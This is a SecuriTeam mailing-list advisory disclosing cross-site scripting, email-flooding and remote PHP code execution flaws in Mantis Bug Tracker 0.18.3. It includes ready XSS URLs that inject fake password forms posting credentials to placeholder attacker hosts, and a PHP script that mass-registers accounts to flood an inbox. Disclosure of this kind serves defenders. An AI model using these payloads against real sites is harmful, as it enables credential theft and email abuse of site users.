The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mantis Bug Tracker Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.mantisbt.org/> Mantis is "a web-based bug tracking system. It
is written in the PHP scripting language and requires the MySQL database
and a web server".
The Mantis bug tracking system suffers from multiple security issues
mainly due to improper input validation. Hence, cross-site scripting and
even PHP code execution are possible through this system.
DETAILS
Vulnerable Systems:
* Mantis version 0.18.3
Immune Systems:
* Mantis version 0.19.0a2 (Alpha) from CVS
* The 'return' parameter in the login_page.php script are not properly
sanitized and allow a malicious user to input malicious content. It is
possible to login anonymously and in order to perform a privileged action,
login as a registered user. The previous URL is passed as the return
parameter and through it, any HTML or script code can be injected. An
example for the XSS vulnerability:
http://<site-with-mantis-bugtracker>/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform
action=%22http://malicious.site.com/script.xxx%22%3EPlease type your password
: %3Cinput type=%22password%22 name=%22your_password%22%3E%3Cbr%3E%3Cinput
type=%22submit%22 value=%22Give me your password,
please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr
* Another XSS vulnerability can be found in the signup.php script (ex.:
<http://bugs.mantisbt.org/signup.php>
http://bugs.mantisbt.org/signup.php). The Email address field is not
properly sanitized and will allow dangerous content to be passed. One can
put the following into the Email address:
<iframe src=http://www.playboy.com></iframe> or <h1>Hi!</h1>
* The 'Select Project' script is also vulnerable to a cross site
scripting attack. The script is 'login_select_proj_page.php' and the
following URL can be used to demonstrate and exploit this issue:
http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%3Cbr%3E%3Cform
action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput
type=text
name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput
type=password name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd colspan=2%3E%3Cinput
type=submit value=%22login%22
onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E
* Cross site scripting vulnerability in the 'view_all_set.php', example
given below:
http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>
In addition to the multiple cross-site scripting vulnerabilities, it is
also possible to exploit the product and cause it to send a fairly
arbitrary (and large) amount of emails to a user.
Exploit:
The following script can be used to determine whether your system is
vulnerable to attack or not:
<?php
//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://<site-with-mantis-bugtracker";
for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $i\n");
$user = "$base_user$i";
echo("New user is $user\n");
$url = "http://$site/signup.php?username=$user&email=$email";;
echo("URL is $url\n");
$fd = fopen($url,"r");
echo("E-mail $i sended\n");
fclose($fd);
}
?>
Finally, there is also a remote PHP code execution in the system. If the
REGISTER_GLOBAL variable is set, an attacker is able to inject and execute
PHP code by overwriting the $t_core_dir global variable. The vulnerable
scripts are:
bug_api.php -> at line 22 (using variable $t_core_path)
relationship_api.php -> Line 14 (using variable $t_core_dir)
Vendor Status:
The maintainers of Mantis have been informed and the fixes are already in
the CVS tree, in the alpha version.
ADDITIONAL INFORMATION
The information has been provided by <mailto:joxeankoret@yahoo.es> Joxean
Koret.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
